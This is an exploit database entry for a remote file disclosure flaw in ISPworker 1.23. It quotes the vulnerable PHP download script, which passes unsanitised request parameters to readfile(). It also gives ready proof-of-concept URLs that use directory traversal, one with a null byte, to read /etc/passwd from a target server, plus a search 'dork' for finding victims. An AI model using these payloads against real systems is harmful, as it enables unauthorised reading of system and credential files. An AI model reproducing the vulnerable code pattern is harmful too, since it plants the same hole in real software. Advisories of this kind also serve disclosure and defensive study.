ISPworker 1.23 - Remote File Disclosure

Author: cr4wl3r
type: webapps
platform: linux
port: 80.0
date_added: 2009-11-30 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comispworker-1.23.tar.gz

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]



########################################################################

#ISPworker <= 1.23 Remote File Disclosure exploit

#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz

#Dork                 :  die("lamers attempt");  :P

########################################################################

#

#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php

#

#       <?header('Content-type: '.$_REQUEST[type]);

#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');

#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);

#       ?>

#

#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00

#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

#

########################################################################

########################################################################

####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################

########################################################################

########################################################################



   [ Gorontalo / 2009 ]